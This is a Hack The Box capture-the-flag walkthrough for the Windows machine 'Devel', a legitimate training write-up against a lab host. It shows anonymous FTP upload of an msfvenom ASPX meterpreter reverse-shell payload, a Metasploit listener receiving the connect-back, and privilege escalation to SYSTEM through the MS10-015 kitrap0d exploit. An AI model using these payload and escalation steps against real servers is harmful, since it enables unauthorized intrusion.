Hack The Box: Devel

About

Name: Devel
IP Address: 10.10.10.5
Operating System: Windows
Difficulty: 3.7/10
Base Points: 20

Enumeration

As always we start with a NMAP scan to discover open ports and services running on the server:

nmap -sC -sV 10.10.10.5
Starting Nmap 7.70 ( https://nmap.org ) at 2019-01-09 17:32 CET
Nmap scan report for 10.10.10.5
Host is up (0.038s latency).
Not shown: 998 filtered ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     Microsoft ftpd
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
| 03-18-17  01:06AM       DIR          aspnet_client
| 03-17-17  04:37PM                  689 iisstart.htm
|_03-17-17  04:37PM               184946 welcome.png
| ftp-syst:
|_  SYST: Windows_NT
80/tcp open  http    Microsoft IIS httpd 7.5
| http-methods:
|_  Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/7.5
|_http-title: IIS7
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Looking at the NMAP scan we have two ports open; 80 and 21.
We also have access to the FTP server if we login as Anonymous.

Initial Foothold

Going to the website reveals nothing special. Just a standard IIS page:

Let's check the FTP server as well.

ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> dir
200 PORT command successful.
125 Data connection already open; Transfer starting.
03-18-17  01:06AM       DIR          aspnet_client
03-17-17  04:37PM                  689 iisstart.htm
03-17-17  04:37PM               184946 welcome.png
226 Transfer complete.

Okay, we have read access. But what about write access? If we can write files to the FTP server we can probable upload code and get a reverse shell working.

Testing to see if we have write access confirms that we can write files to the FTP server and access the file through the HTTP server.

Let's create and upload an .aspx shell and see if we can get the server to connect back to us.

Create ASPX Shell And Upload

As usual we use msfvenom to create the shellcode. We specify that we want a meterpreter shell reverse_tcp. We will listen on port 4444, format will be aspx and the code should output to shell.aspx

msfvenom -p windows/meterpreter/reverse_tcp LPORT=4444 LHOST=10.10.14.8 -f aspx > shell.aspx
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder or badchars specified, outputting raw payload
Payload size: 341 bytes
Final size of aspx file: 2814 bytes

Now we need to upload the shell to server.

ftp 10.10.10.5
Connected to 10.10.10.5.
220 Microsoft FTP Service
Name (10.10.10.5:root): Anonymous
331 Anonymous access allowed, send identity (e-mail name) as password.
Password:
230 User logged in.
Remote system type is Windows_NT.
ftp> put shell.aspx shell.aspx
local: shell.aspx remote: shell.aspx
200 PORT command successful.
125 Data connection already open; Transfer starting.
226 Transfer complete.
2850 bytes sent in 0.00 secs (33.5552 MB/s)

Awesome! The shell uploads successfully!
Now we need to setup Metasploit to handle the connect-back and the second stage of the meterpreter session.

Metasploit

root@kali:~# msfdb run
[i] Database already started


         .                                         .
 .

      dBBBBBBb  dBBBP dBBBBBBP dBBBBBb  .                       o
       '   dB'                     BBP
    dB'dB'dB' dBBP     dBP     dBP BB
   dB'dB'dB' dBP      dBP     dBP  BB
  dB'dB'dB' dBBBBP   dBP     dBBBBBBB

                                   dBBBBBP  dBBBBBb  dBP    dBBBBP dBP dBBBBBBP
          .                  .                  dB' dBP    dB'.BP
                             |       dBP    dBBBB' dBP    dB'.BP dBP    dBP
                           --o--    dBP    dBP    dBP    dB'.BP dBP    dBP
                             |     dBBBBP dBP    dBBBBP dBBBBP dBP    dBP

                                                                    .
                .
        o                  To boldly go where no
                            shell has gone before


       =[ metasploit v4.17.21-dev                         ]
+ -- --=[ 1822 exploits - 1033 auxiliary - 316 post       ]
+ -- --=[ 539 payloads - 42 encoders - 10 nops            ]
+ -- --=[ Free Metasploit Pro trial: http://r-7.co/trymsp ]

msf > use exploit/multi/handler
msf exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
payload => windows/meterpreter/reverse_tcp
msf exploit(multi/handler) > options

Module options (exploit/multi/handler):

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST                      yes       The listen address (an interface may be specified)
   LPORT                      yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Wildcard Target


msf exploit(multi/handler) > set LHOST tun0
LHOST => 10.10.14.8
msf exploit(multi/handler) > set LPORT 4444
LPORT => 4444
msf exploit(multi/handler) > run

[*] Started reverse TCP handler on 10.10.14.8:4444

I use the exploit/multi/handler with the windows/meterpreter/reverse_tcp payload.
I set the LPORT to the port we defined in our .aspx payload, and LHOST to tun0, which is my tunnel/vpn interface connecting to HackTheBox.
You can also specifiy your HTB IP-address instead of tun0.

Finally we run the exploit and it's now listening for something to connect back to us.

If we now go http://10.10.10.5/shell.aspx we will trigger our shellcode and we will get a connect-back.

[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 1 opened (10.10.14.8:4444 -> 10.10.10.5:49158) at 2019-01-09 17:48:47 +0100

meterpreter > sysinfo
Computer        : DEVEL
OS              : Windows 7 (Build 7600).
Architecture    : x86
System Language : el_GR
Domain          : HTB
Logged On Users : 0
Meterpreter     : x86/windows

meterpreter > getuid
Server username: IIS APPPOOL\Web

Awesome! The server connected back to us and we got a meterpreter shell!

But we are only running as ISS APPPOOL. So we need to escalate our privileges!
The server seems to be running Windows 7 so there should be a few vulnerabilities we can exploit.

Privilege Escalation

Metasploit has an awesome module called exploit_suggester. Let's run that on our session and see if we can discover potential exploits we can use to elevate our privileges.

meterpreter > background
[*] Backgrounding session 1... 
msf > use post/multi/recon/local_exploit_suggester 
msf post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.5 - Collecting local exploits for x86/windows...
[*] 10.10.10.5 - 28 exploit checks are being tried...
[+] 10.10.10.5 - exploit/windows/local/bypassuac_eventvwr: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms10_015_kitrap0d: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms10_092_schelevator: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_053_schlamperei: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms13_081_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms15_004_tswbproxy: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ms16_016_webdav: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The target service is running, but could not be validated.
[+] 10.10.10.5 - exploit/windows/local/ms16_075_reflection: The target appears to be vulnerable.
[+] 10.10.10.5 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed

We background our meterpreter session and use the post module multi/recon/local_exploit_suggester.
We set it to search for exploit in session 1 (our meterpreter session) and run it.

We get quite a few suggestions back from the module. Let's try MS10_015.

msf post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms10_015_kitrap0d 
msf exploit(windows/local/ms10_015_kitrap0d) > set session 1
session => 1
msf exploit(windows/local/ms10_015_kitrap0d) > run

[*] Started reverse TCP handler on 10.10.14.8:4444 
[*] Launching notepad to host the exploit...
[+] Process 3624 launched.
[*] Reflectively injecting the exploit DLL into 3624...
[*] Injecting exploit into 3624 ...
[*] Exploit injected. Injecting payload into 3624...
[*] Payload injected. Executing exploit...
[+] Exploit finished, wait for (hopefully privileged) payload execution to complete.
[*] Sending stage (179779 bytes) to 10.10.10.5
[*] Meterpreter session 2 opened (10.10.14.8:4444 -> 10.10.10.5:49158) at 2019-01-09 18:25:47 +0100

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM

Boom! NT AUTHORITY/SYSTEM.
We can now grab both user.txt and root.txt.

C:\Users\babis\Desktop>type user.txt.txt
type user.txt.txt
9ecdd6...4cb3e8

C:\Users\Administrator\Desktop>type root.txt.txt
type root.txt.txt
e621a0...c72b4b

Further Reading

https://docs.microsoft.com/en-us/security-updates/securitybulletins/2010/ms10-015

https://www.exploit-db.com/exploits/11199